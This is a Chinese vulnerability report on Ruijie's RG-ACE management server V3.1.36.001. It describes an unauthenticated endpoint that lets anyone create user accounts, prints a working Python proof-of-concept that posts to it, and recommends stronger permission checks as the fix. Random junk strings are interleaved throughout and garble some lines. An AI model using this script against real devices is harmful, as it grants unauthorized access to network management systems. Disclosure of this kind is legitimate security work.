锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
( j- t) I0 k7 `: k' I1 o编译时间: 201104291730
. b; |, u$ B5 k% Q
4 R3 N% O* v1 G  h3 k. f
$ q6 k" M, R5 J: M6 d7 J漏洞证明：
) {7 P+ F2 I( R5 p  x! C


1 Z6 ]2 A9 [/ ~: F+ g$ _) l! {# c: L
' y. L& |7 \/ U- ~3 V

执行脚本
* U3 J  V# ?9 Y4 q#! /usr/bin/env python
3 b; J/ Q" \4 a# E" p8 S* T#coding=gbk
+ g5 ?6 f1 ]" \4 s#RG-ACE管理服务器 V3.1.36.001
) c  j9 k7 F7 P( _) H9 s  J& Bimport urllib2, urllib,cookielib
; r5 r" k3 z+ J0 t; _# p3 burl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
$ G) C0 F0 O* ~, h0 X5 |opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
0 ~5 w* @( t* r$ jopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
0 `3 n7 t+ _  t/ l: Y' s("useropermanager","userManager"),
# B% D; w" G  L# l  @("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
% T3 i- a2 Y: }  O, ?, k("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

. _: T, {6 X; t+ v& h3 z登录，连接设备
) J. E* \) [# O$ e* Z
# J% I, }% Z# X1 N: @

/ s* I! u8 ?% }: h

默认的管理员admin权限更大点
& v# o- k4 s4 @. u: X! \% C
  L; Q. b6 I5 {
  X# C: I/ D+ L; o
5 R$ J$ ~! g- N$ J! @& z2 |1 \, a" w
6 l. p" H0 S# ]: r9 j* \
3 I8 y, B6 c1 j" e' ^+ a修复方案：
0 O2 L& L8 s3 j! F  b  P加强对接口的权限验证
3 {; G! h1 T* r
4 P! G1 q1 i" W+ Q